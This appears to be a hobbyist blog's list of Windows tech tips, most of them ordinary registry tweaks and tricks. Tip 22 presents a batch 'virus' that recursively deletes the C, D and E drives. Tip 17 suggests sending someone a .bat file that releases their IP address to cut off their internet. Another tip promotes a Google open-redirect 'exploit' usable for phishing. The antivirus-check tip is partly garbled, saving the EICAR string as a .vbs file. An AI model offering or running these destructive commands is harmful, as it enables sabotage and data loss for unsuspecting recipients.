TechTips
How To Redirect Any Site From Google ?
1. Go to Google Redirect Exploit
2. Enter Your Url in the input box as shown below
Redirect Any Website Using Google Url
3. After entering the url click on submit and Google's url will be generated in the textarea as show below.
Redirect Any Website Using Google Url
4. Now you can use that url and upon visiting that url you will be redirected to your site.
Techtips:-17
How to stop someone's internet access
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew.
Techtips:-18
YouTube Disco
You already knew that you can use YouTube
to stream music, but did you know it can be
a DJ too? YouTube Disco automatically puts
together a playlist of songs from your
preferred genre or artist.
Go to www.youtube.com/disco and enter
any artist, song, or genre and YouTube will
populate a playlist of the most watched/
popular videos from your search.
You can also set it to play the current top
hits and it will tell what videos are most
popular at the moment.
Techtips:-19
Command Prompt on Right-Click
Start > Run
Enter "regedit" and hit Enter
Expand to "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shell"
Right-click on "shell" and select New > Key
Make sure a new key is created under "shell". Change the name of this key to "Command Prompt"
Right-click on this new key "Command Prompt" and select New > Key
Change the name of this key to "command"
Double-click on the "(Default)" text on the right window to bring up the edit box
Enter this text into the Value Data field:
cmd.exe "%1"
Click OK and close the registry.
Techtips:-20
CHANGE THE LOG ON SCREEN BACKGROUND
Windows makes it easy changing the Windows log-on screen.
1. Go to start, and click on Run, type Regedit & press enter there.
2. Navigate to : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Authentication\ LogonUI\Background
3. Double-click the OEMBackground DWORD key
4. Set value of the key to 1.
5. Select a background image for Logon Screen with size less than 256KB in size (Use of Image Resize software like VSO Resizer can help)
6. Copy that image into the C:\Windows\system32\oobe\info\backgrounds folder
7. Rename the image to backgroundDefault.jpg
8. Reboot, and now your logon Image would have changed.
Techtips:-21
your antivirus is real or fake or you can say that your antivirus is working or not , here are some steps just follow them and enjoy
1.)
First of all press WINDOWS KEY R to open run command and write NOTEPAD here to open notepad.
2.)
Now copy and paste the below code into your notepad.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H H*
3.)
After that press CTRL S to save this file, here save this file as W2H.vbs on your DESKTOP
4.)
If your antivirus is real then it will not allow you to save this file on your desktop i.e. It will detects as virus and delete it and if your antivirus is fake then it will allow you to save this file.
Techtips:-22
Simple notepad made viruse
Process:
Open Notepad
Copy the below command there
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds...
Techtips:-23
Setting the Network Time in LAN
To set the Server time to your local pc do the following:
1. Open Notepad.
2. Type the following lie:
net time \\server_ip_address /set /yes
3. Save the File as Networktime.bat.
4. Put the file in your start-up.
5. Thats all. When your System starts it gets the Time from your Server.

